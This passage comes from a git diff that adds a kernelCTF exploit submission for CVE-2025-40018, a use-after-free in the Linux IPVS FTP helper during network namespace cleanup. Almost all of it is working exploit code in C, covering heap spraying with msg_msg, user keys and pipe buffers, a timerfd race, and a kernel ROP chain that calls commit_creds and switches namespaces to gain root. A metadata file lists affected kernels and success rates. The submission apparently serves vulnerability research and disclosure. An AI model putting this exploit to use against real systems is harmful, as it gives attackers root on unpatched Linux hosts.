close(packet_fds[i + j]); + packet_fds[i + j] = -1; + } + } +} + +/* CPU #0: netns cleanup kthread (free-and-then-use) / CPU #1: spray thread + * After unshare(CLONE_NEWNET), the slab that the victim is on becomes full. + * When a full slab becomes partial, it will be put in the current CPU's + * partial list. 
+ * We should do full-->partial transition for the slab on CPU #1 in + * advance for cross-cpu allocation. + * If not, the slab's full-->partial transition will happen in kthread on + * CPU #0, and it will be put in CPU #0's partial list. We will be unable + * to reclaim the victim from spray thread on CPU #1. + * Since the victim locates in the slots with pg_vec on the same slab, + * free some pg_vec(1 per slab) on CPU #1 to make the slab full-->partial. + */ +static void freeze_victim_slab() { + for (int i = 0; i < PACKET_SPRAY_CNT; i += KMALLOC_256_OBJS_PER_SLAB) { + close(packet_fds[i + SLOTS_PER_SLAB]); + packet_fds[i + SLOTS_PER_SLAB] = -1; + } +} + +static void clean_up_pg_vec() { + for (int i = 0; i < PACKET_SPRAY_CNT; i++) { + if (packet_fds[i] < 0) continue; + close(packet_fds[i]); + packet_fds[i] = -1; + } +} + +// =-=-=-=-=-=-=-= KEYRING HELPERS =-=-=-=-=-=-=-= +// We use user_key_payload as spray kmalloc-256 object to occupy freed +// victim obj and rewrite app->module to arbitrary address, to get +// arbitrary address decrement primitive by module_put(app->module). 
+#define USER_KEY_PAYLOAD_SZ 24 +#define KEY_PAYLOAD_SIZE (KMALLOC256_SIZE - USER_KEY_PAYLOAD_SZ) +#define KEY_SPRAY_NUM 40 + +typedef int32_t key_serial_t; + +static inline key_serial_t add_key(const char *type, const char *description, + const void *payload, size_t plen, key_serial_t ringid) { + return syscall(__NR_add_key, type, description, payload, plen, ringid); +} + +static inline key_serial_t key_revoke(key_serial_t keyid) +{ + return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0); +} + +char key_desc[KMALLOC256_SIZE]; +char key_payload[KEY_PAYLOAD_SIZE + 1]; +key_serial_t id_buffer[KEY_SPRAY_NUM]; + +static inline void spray_userkey() { + for (uint32_t i = 0; i < KEY_SPRAY_NUM; i++) { + snprintf(key_desc, KMALLOC256_SIZE, "SPRAY-RING-%03du", i); + id_buffer[i] = add_key("user", key_desc, key_payload, + KEY_PAYLOAD_SIZE, KEY_SPEC_PROCESS_KEYRING); + if (id_buffer[i] < 0) die("add_key %d", i); + } +} + +static inline void cleanup_userkey() { + for (uint32_t i = 0; i < KEY_SPRAY_NUM; i++) { + if (key_revoke(id_buffer[i]) < 0) die("key_revoke"); + } +} + +// =-=-=-=-=-=-=-= PIPE_BUFFER HELPERS =-=-=-=-=-=-=-= +#define PIPE_BUFFER_SPRAY_NUM 0x100 +int pipe_fds[PIPE_BUFFER_SPRAY_NUM][2]; + +static inline void spray_pipe_buffer() { + for (int i = 0; i < PIPE_BUFFER_SPRAY_NUM; i++) { + pipe(pipe_fds[i]); + } +} + +// =-=-=-=-=-=-=-= MSG_MSG HELPERS =-=-=-=-=-=-=-= +#define MSG_SPRAY_NUM_PER_PROCESS 32000 // maximal num of msg_msg queues per ipc ns +#define MSG_SECOND_SPRAY_NUM 2000 +#define MSG_FIRST_SPRAY_NUM (MSG_SPRAY_NUM_PER_PROCESS - MSG_SECOND_SPRAY_NUM) +#define KMALLOC_CG_4K_SZ 0x1000 +#define MSG_MSG_SZ 0x30 +#define MSG_MSG_DATA_SZ (KMALLOC_CG_4K_SZ - MSG_MSG_SZ) +#define KMALLOC_CG_1K_SZ 0x400 +#define MSG_MSGSEG_SZ 8 +#define MSG_MSGSEG_DATA_SZ (KMALLOC_CG_1K_SZ - MSG_MSGSEG_SZ) +#define MSGBUF_SZ (MSG_MSG_DATA_SZ + MSG_MSGSEG_DATA_SZ) +#define SPRAY_PROCESS_NUM 12 + +// After spraying 1.37 GB msg_msg, the msg_msg has +// high probability to be 
allocated at leak_kheap_base + GUESSED_OFFSET +#define GUESSED_OFFSET 0xa000000 +#define GUESSED_MSG_ADDR (leak_kheap_base + GUESSED_OFFSET) +#define MAGIC_MARKER 0xdeadbeef + +struct msg_buf { + uint64_t mtype; + char mtext[MSGBUF_SZ]; +}; +int *msg_queues; +int *hit; + +// For a 3.5 GB RAM system, we spray MSG_FIRST_SPRAY_NUM * SPRAY_PROCESS_NUM +// * KMALLOC_CG_4K_SZ = 1.37 GB of msg_msg +void spray_msg(int process_idx) { + struct msg_buf msgbuf; + uint64_t msg_idx; + logd("Creating message queue..."); + for (int i = 0; i < MSG_SPRAY_NUM_PER_PROCESS; i++) { + msg_idx = process_idx*MSG_SPRAY_NUM_PER_PROCESS + i; + msg_queues[msg_idx] = msgget(IPC_PRIVATE, IPC_CREAT | 0666); + if (msg_queues[msg_idx] < 0) + loge("Failed to get message queue"); + } + + memset(&msgbuf, 0, sizeof(msgbuf)); + for (int i = 0; i < MSG_FIRST_SPRAY_NUM; i++) { + msg_idx = process_idx * MSG_SPRAY_NUM_PER_PROCESS + i; + msgbuf.mtype = msg_idx + 1; + char *msg_msgseg_data = &msgbuf.mtext[MSG_MSG_DATA_SZ]; + // Identification for each msg_msgseg + *(uint64_t *)(msg_msgseg_data) = msg_idx; + // MAGIC_MARKER is the oracle of a partial overlap of msg_msgseg + *(uint64_t *)(msg_msgseg_data + 0x100) = MAGIC_MARKER; + *(uint64_t *)(msg_msgseg_data + 0x200) = MAGIC_MARKER; + *(uint64_t *)(msg_msgseg_data + 0x300) = MAGIC_MARKER; + if (msgsnd(msg_queues[msg_idx], &msgbuf, MSGBUF_SZ, 0) < 0) + loge("Failed to send message"); + } +} + +// Peek every msg_msgseg after a race try. If it succeeds, lock in the timerfd +// timeout count and keep triggering the race to modify the target msg_msg->next +// until it points to another msg_msgseg. Then perform the post exploit. 
+void peek_msg(int process_idx) {
+    struct msg_buf msgbuf;
+    uint64_t msg_idx, victim_idx, target_idx;
+    for (int i = 0; i < MSG_FIRST_SPRAY_NUM; i++) {
+        msg_idx = process_idx * MSG_SPRAY_NUM_PER_PROCESS + i;
+        memset(&msgbuf, 0, sizeof(msgbuf));
+        if (msgrcv(msg_queues[msg_idx], &msgbuf, MSGBUF_SZ,
+                   0, MSG_COPY | IPC_NOWAIT | MSG_NOERROR) < 0)
+            loge("Failed to receive message");
+
+        target_idx = *(uint64_t *)(&msgbuf.mtext[MSG_MSG_DATA_SZ]);
+        // No overlap, continue
+        if (target_idx == msg_idx) continue;
+
+        // Partial overlap of msg_msgseg detected, the race succeeded
+        if (!*hit) { logs("hit"); *hit = 1; }
+        // Keep triggering the race to modify the target msg_msg->next
+        // until it points to another msg_msgseg.
+        if (target_idx == MAGIC_MARKER) continue;
+
+        // Now we have two fully overlapping msg_msgseg objects; run the post-exploitation
+        victim_idx = msg_idx;
+        bind_to_cpu(1);
+        logs("victim: 0x%lx now overlaps with target: 0x%lx", victim_idx, target_idx);
+        logi("free victim msg_msgseg");
+        if (msgrcv(msg_queues[victim_idx], &msgbuf, MSGBUF_SZ,
+                   victim_idx + 1, IPC_NOWAIT | MSG_NOERROR) < 0)
+            loge("Failed to receive message");
+        spray_pipe_buffer();
+        logi("free target msg_msgseg");
+        if (msgrcv(msg_queues[target_idx], &msgbuf, MSGBUF_SZ,
+                   target_idx + 1, IPC_NOWAIT | MSG_NOERROR) < 0)
+            loge("Failed to receive message");
+
+        memset(&msgbuf, 0, sizeof(msgbuf));
+        #define PIPE_BUFFER_OFFS_OPS 0x10 // pipe_buffer->ops offset
+        #define PIPE_BUF_OPS_OFFS_RELEASE 0x08 // pipe_buf_operations->release offset
+        char *msg_msg_data = &msgbuf.mtext[0x0];
+        char *msg_msg = msg_msg_data - MSG_MSG_SZ;
+        char *msg_msgseg_data = &msgbuf.mtext[MSG_MSG_DATA_SZ];
+        char *msg_msgseg = msg_msgseg_data - MSG_MSGSEG_SZ;
+        char *fake_pipe_buffer = msg_msgseg;
+
+        *(uint64_t *)&fake_pipe_buffer[PIPE_BUFFER_OFFS_OPS] = GUESSED_MSG_ADDR + 0x100; // fake_ops
+        char *fake_ops = msg_msg + 0x100;
+        *(uint64_t *)&fake_ops[PIPE_BUF_OPS_OFFS_RELEASE] =
+            PUSH_RSI_JMP_QWORD_PTR_RSI_0X39 + kernel_offset; // pivot gadget
+        *(uint64_t *)(fake_pipe_buffer + 0x39) = POP_RSP_POP_R15_RET + kernel_offset; // pivot gadget
+
+        // push rsi ; pop rsp ; pop r15 ; --> rsp == rsi + 8
+        uint64_t *rop = (uint64_t *)(fake_pipe_buffer + 8);
+        int i = 0;
+        rop[i++] = POP_RDI_RET + kernel_offset; // slide gadget
+        i += 1; // Avoid corrupting fake_pipe_buffer[PIPE_BUFFER_OFFS_OPS]
+        rop[i++] = POP_RDI_RET + kernel_offset;
+        rop[i++] = INIT_CRED + kernel_offset;
+        rop[i++] = POP_R12_POP_RBP_POP_RBX_RET + kernel_offset; // slide gadget
+        i += 3; // Avoid corrupting fake_pipe_buffer + 0x39
+        rop[i++] = COMMIT_CREDS + kernel_offset;
+
+        rop[i++] = POP_RDI_RET + kernel_offset;
+        rop[i++] = 1;
+        rop[i++] = FIND_TASK_BY_VPID + kernel_offset;
+
+        rop[i++] = POP_RSI_RET + kernel_offset;
+        rop[i++] = GUESSED_MSG_ADDR + 0x200 + 0x7f;
+        rop[i++] = PUSH_RAX_JMP_QWORD_PTR_RSI_MINUS_0x7f + kernel_offset;
+        *(uint64_t *)(&msg_msg[0x200]) = POP_RDI_RET + kernel_offset;
+        rop[i++] = POP_RSI_RET + kernel_offset;
+        rop[i++] = INIT_NSPROXY + kernel_offset;
+        rop[i++] = SWITCH_TASK_NAMESPACES + kernel_offset;
+
+        rop[i++] = RET2USERMODE + kernel_offset;
+        rop[i++] = 0;
+        rop[i++] = 0;
+        rsp &= ~0xf;
+        rsp += 8;
+        rop[i++] = (uint64_t)win;
+        rop[i++] = cs;
+        rop[i++] = rflags;
+        rop[i++] = rsp;
+        rop[i++] = ss;
+
+        // Spray msg_msgseg to rewrite pipe_buffer
+        for (int i = MSG_FIRST_SPRAY_NUM; i < MSG_SPRAY_NUM_PER_PROCESS; i++) {
+            msg_idx = process_idx * MSG_SPRAY_NUM_PER_PROCESS + i;
+            msgbuf.mtype = msg_idx + 1;
+            if (msgsnd(msg_queues[msg_idx], &msgbuf, MSGBUF_SZ, 0) < 0)
+                loge("Failed to send message");
+        }
+        // Trigger pipe_buffer->ops->release() and run the ROP chain
+        for (int i = 0; i < PIPE_BUFFER_SPRAY_NUM; i++) {
+            close(pipe_fds[i][0]);
+            close(pipe_fds[i][1]);
+        }
+        sleep(1);
+        loge("exploit failed");
+    }
+}
+
+// =-=-=-=-=-=-=-= MAIN =-=-=-=-=-=-=-=
+struct ip_vs_svcdest_user {
+    struct ip_vs_service_user svc;
+    struct ip_vs_dest_user dest;
+} __attribute__((packed));
+
+int pipe_fd[2][2];
+
+void setup_ipvs() {
bring_interface_up("lo");
+
+    int tcp_fd = socket(AF_INET, SOCK_STREAM, 0);
+    if (tcp_fd < 0) die("Failed to create TCP socket");
+
+    // Add ipvs service
+    struct ip_vs_service_user ip_vs_service;
+    memset(&ip_vs_service, 0, sizeof(ip_vs_service));
+    ip_vs_service.protocol = IPPROTO_TCP;
+    ip_vs_service.addr = inet_addr("127.0.0.1");
+    ip_vs_service.port = htons(21); // Set to FTP's port
+    ip_vs_service.timeout = 30 * 60;
+    memcpy(ip_vs_service.sched_name, "rr", 3);
+    setsockopt(tcp_fd, SOL_IP, IP_VS_SO_SET_ADD, &ip_vs_service, sizeof(ip_vs_service));
+
+    // Add ipvs destination
+    struct ip_vs_svcdest_user ip_vs_svcdest;
+    memset(&ip_vs_svcdest, 0, sizeof(ip_vs_svcdest));
+    memcpy(&ip_vs_svcdest.svc, &ip_vs_service, sizeof(ip_vs_service));
+    ip_vs_svcdest.dest.addr = inet_addr("127.0.0.1");
+    ip_vs_svcdest.dest.port = htons(1337);
+    ip_vs_svcdest.dest.conn_flags = IP_VS_CONN_F_MASQ;
+    ip_vs_svcdest.dest.weight = 1;
+    ip_vs_svcdest.dest.u_threshold = 0;
+    ip_vs_svcdest.dest.l_threshold = 0;
+    setsockopt(tcp_fd, SOL_IP, IP_VS_SO_SET_ADDDEST, &ip_vs_svcdest, sizeof(ip_vs_svcdest));
+
+    // Create FTP connection
+    struct sockaddr_in backend_addr;
+    memset(&backend_addr, 0, sizeof(backend_addr));
+    backend_addr.sin_family = AF_INET;
+    backend_addr.sin_port = htons(1337);
+    backend_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
+
+    int recv_fd = socket(AF_INET, SOCK_STREAM, 0);
+    if (recv_fd < 0) die("socket");
+    if (bind(recv_fd, (struct sockaddr *)&backend_addr, sizeof(backend_addr)) < 0)
+        die("bind");
+    if (listen(recv_fd, 5) < 0) die("listen");
+    struct sockaddr_in service_addr;
+    memset(&service_addr, 0, sizeof(service_addr));
+    service_addr.sin_family = AF_INET;
+    service_addr.sin_port = htons(21);
+    service_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
+    if (connect(tcp_fd, (struct sockaddr *)&service_addr, sizeof(service_addr)) < 0)
+        die("connect");
+    const char *msg = "AAAA";
+    // Send a message over the new ip_vs_conn, whose cp->app->app is the victim object
+    if (send(tcp_fd, msg,
strlen(msg)+1, 0) < 0)
+        die("send");
+    close(tcp_fd);
+    close(recv_fd);
+}
+
+static void *busy_waiting(void *arg) {
+    uint64_t core = (uint64_t)arg;
+    bind_to_cpu(core);
+    while (1);
+}
+
+static inline void set_dec_addr(uint64_t target) {
+    char *user_key_payload = key_payload - USER_KEY_PAYLOAD_SZ;
+    char *fake_ip_vs_app = user_key_payload;
+    #define IP_VS_APP_OFFSETS_MODULE 40 // ip_vs_app->module offset
+    #define MODULE_OFFSETS_REFCNT 832 // module->refcnt offset
+    *(uint64_t *)&fake_ip_vs_app[IP_VS_APP_OFFSETS_MODULE] = target - MODULE_OFFSETS_REFCNT;
+}
+
+void *spray_job(void *arg) {
+    bind_to_cpu(1);
+    while (1) {
+        barrier(&barr);
+
+        struct timespec ts = { .tv_nsec = count };
+        nanosleep(&ts, NULL);
+        spray_userkey();
+        barrier(&barr);
+
+        cleanup_userkey();
+        barrier(&barr);
+    }
+}
+
+typedef struct {
+    sem_t child_sem;
+    sem_t parent_sem;
+} shared_sems;
+
+int main(int argc, char *argv[]) {
+    save_status();
+    // Leak the KASLR offset via EntryBleed
+    leak();
+
+    // Initialize shared data
+    shared_sems *shared = mmap(NULL, sizeof(shared_sems), PROT_READ | PROT_WRITE,
+                               MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+    if (shared == MAP_FAILED) die("mmap");
+    if (sem_init(&shared->child_sem, 1, 0) < 0) die("sem_init");
+    if (sem_init(&shared->parent_sem, 1, 0) < 0) die("sem_init");
+
+    hit = mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+    if (hit == MAP_FAILED) die("mmap");
+
+    msg_queues = mmap(NULL, sizeof(int) * MSG_SPRAY_NUM_PER_PROCESS * SPRAY_PROCESS_NUM,
+                      PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+    if (msg_queues == MAP_FAILED) die("mmap");
+
+    // Fork children for spraying msg_msg
+    int pid[SPRAY_PROCESS_NUM];
+    for (int i = 0; i < SPRAY_PROCESS_NUM; i++) {
+        pid[i] = fork();
+        if (!pid[i]) {
+            setup_namespace();
+            bind_to_cpu(1);
+            spray_msg(i);
+            while (1) {
+                sem_post(&shared->child_sem);
+                sched_yield();
+                sem_wait(&shared->parent_sem);
+                peek_msg(i);
+            }
+        }
+    }
+
+    setup_namespace();
+    struct rlimit rlim = {
.rlim_cur = 0xf000, .rlim_max = 0xf000 };
+    setrlimit(RLIMIT_NOFILE, &rlim);
+
+    // Use busy-loop threads to occupy every CPU except #0, increasing the
+    // probability that the kernel schedules net_cleanup_work onto CPU #0
+    #define BUSY_WAITING_THREADS 1
+    ncpus = sysconf(_SC_NPROCESSORS_CONF);
+    pthread_t tid[ncpus][BUSY_WAITING_THREADS];
+    uint64_t args[ncpus];
+    for (int i = 1; i < ncpus; i++) {
+        args[i] = i;
+        for (int j = 0; j < BUSY_WAITING_THREADS; j++) {
+            pthread_create(&tid[i][j], 0, busy_waiting, (void *)args[i]);
+        }
+    }
+
+    tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0));
+    do_epoll_enqueue(tfd, 17);
+
+    char signal;
+    pipe(pipe_fd[0]);
+    pipe(pipe_fd[1]);
+
+    bind_to_cpu(1);
+    pthread_barrier_init(&barr, NULL, 2);
+    pthread_t tid_spray_userkey;
+    pthread_create(&tid_spray_userkey, 0, spray_job, NULL);
+
+    // The timer count needed to hit the race window depends on the CPU.
+    // The range was chosen experimentally for the GitHub Actions environment.
+    #define TIMERFD_COUNT_START 35645000
+    #define TIMERFD_COUNT_END 35733000
+    count = TIMERFD_COUNT_START;
+    // Abort after 6 mins so the PR verification workflow starts the next attempt
+    alarm(360);
+    while (1) {
+        for (int i = 0; i < SPRAY_PROCESS_NUM; i++) {
+            sem_wait(&shared->child_sem);
+        }
+
+        struct itimerspec new = { .it_value.tv_nsec = count };
+        logd("count:%010d", count);
+        if (!(*hit)) {
+            count += 1000;
+            if (count > TIMERFD_COUNT_END)
+                count = TIMERFD_COUNT_START;
+        }
+
+        #define MSG_MSG_NEXT_OFFSET 0x20 // msg_msg->next offset
+        set_dec_addr(GUESSED_MSG_ADDR + MSG_MSG_NEXT_OFFSET + 1);
+        // Decrement the byte at &msg_msg->next + 1 with the arbitrary-decrement
+        // primitive, so msg_msg->next decreases by 0x100
+
+        if (!fork()) {
+            bind_to_cpu(1);
+
+            write(pipe_fd[0][1], &signal, 1);
+            read(pipe_fd[1][0], &signal, 1);
+            // The victim ip_vs_app (ip_vs_ftp) is allocated here
+            if (unshare(CLONE_NEWNET)) die("unshare(CLONE_NEWNET)");
+
+            write(pipe_fd[0][1], &signal, 1);
+            read(pipe_fd[1][0], &signal, 1);
+            // Switch CPU to reduce noise
+            bind_to_cpu(0);
setup_ipvs();
+            bind_to_cpu(1);
+
+            write(pipe_fd[0][1], &signal, 1);
+            read(pipe_fd[1][0], &signal, 1);
+            return 0; // Exit to schedule net_cleanup_work
+        }
+
+        read(pipe_fd[0][0], &signal, 1);
+        spray_pg_vec_and_create_slots();
+        write(pipe_fd[1][1], &signal, 1);
+        // Child: unshare(CLONE_NEWNET) to allocate the victim
+        read(pipe_fd[0][0], &signal, 1);
+        freeze_victim_slab();
+        write(pipe_fd[1][1], &signal, 1);
+
+        read(pipe_fd[0][0], &signal, 1);
+        // Set the timer on CPU #0 and start racing
+        bind_to_cpu(0);
+        timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL);
+        bind_to_cpu(1);
+        write(pipe_fd[1][1], &signal, 1);
+        barrier(&barr);
+
+        usleep(100000); // Wait for the netns cleanup to finish
+        barrier(&barr);
+
+        clean_up_pg_vec();
+        barrier(&barr);
+
+        for (int i = 0; i < SPRAY_PROCESS_NUM; i++)
+            sem_post(&shared->parent_sem); // notify the children to check whether the race succeeded
+    }
+
+    return 0;
+}
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/metadata.json b/pocs/linux/kernelctf/CVE-2025-40018_cos/metadata.json
new file mode 100644
index 000000000..276a114e9
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-40018_cos/metadata.json
@@ -0,0 +1,26 @@
+{
+  "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
+  "submission_ids": ["exp416"],
+  "vulnerability": {
+    "summary": "IPVS FTP helper Use-After-Free during network namespace cleanup",
+    "cve": "CVE-2025-40018",
+    "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=134121bfd99a06d44ef5ba15a9beb075297c0821",
+    "affected_versions": ["2.6.39 - 6.18"],
+    "requirements": {
+      "attack_surface": ["userns"],
+      "capabilities": ["CAP_NET_ADMIN"],
+      "kernel_config": [
+        "CONFIG_NETFILTER",
+        "CONFIG_IP_VS",
+        "CONFIG_IP_VS_FTP"
+      ]
+    }
+  },
+  "exploits": {
+    "cos-113-18244.448.33": {
+      "uses": ["userns"],
+      "requires_separate_kaslr_leak": false,
+      "stability_notes": "Succeeds 3~4 times per 10 runs"
+    }
+  }
+}
\ No newline at
end of file
diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2025-40018_cos/original.tar.gz
new file mode 100755
index 000000000..d06d359cc
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-40018_cos/original.tar.gz differ